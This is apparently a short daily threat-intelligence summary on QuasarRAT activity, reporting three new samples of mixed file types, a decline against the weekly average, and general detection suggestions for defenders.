Daily Summary
QuasarRAT activity declined sharply on 2026-06-21 with only 3 new samples detected, representing a 74% drop from the 7-day average of 12. This continues a downward trend, though the sample types suggest possible shifts in delivery tactics rather than an overall threat reduction.
New Samples Detected
The three samples collected today introduce an unusual diversity in file types: one .bat, one .xlsm, and one .exe. The presence of a .bat file is notable, as QuasarRAT historically favors compiled executables or macro-enabled Office documents. This suggests threat actors may be experimenting with script-based initial access, possibly to bypass static analysis rules that flag common PE headers.
Distribution Methods
The inclusion of an .xlsm sample aligns with ongoing phishing campaigns, but the concurrent appearance of a .bat file is unexpected. .bat delivery often points to automated droppers in spear-phishing attachments or shared via cloud storage links. This mix may indicate a small but targeted wave rather than broad spamming, as volume is low enough to suggest hand-picked victims.
7-Day Trend
Today’s 3 samples represent a 74% decline from the 7-day average of 12, placing activity at a quarter of typical levels. This deviation exceeds the 25% threshold for highlighting a trend change. The drop could reflect operational pauses by established groups, shifts to other RATs, or pre-staging for a larger campaign, but sustained monitoring is needed before concluding a genuine downturn.
Security Analysis
The low sample count alongside the appearance of .bat files is a non-obvious development, as QuasarRAT payloads in script form are rare. This may indicate actors probing detection gaps in environments that focus on Office macros or PE files but overlook batch scripts flagged as “low risk.” Defenders should update detection rules to flag any .bat file that attempts process injection, network connections to uncommon ports, or downloads from IP addresses, especially in conjunction with recent user-reported email anomalies.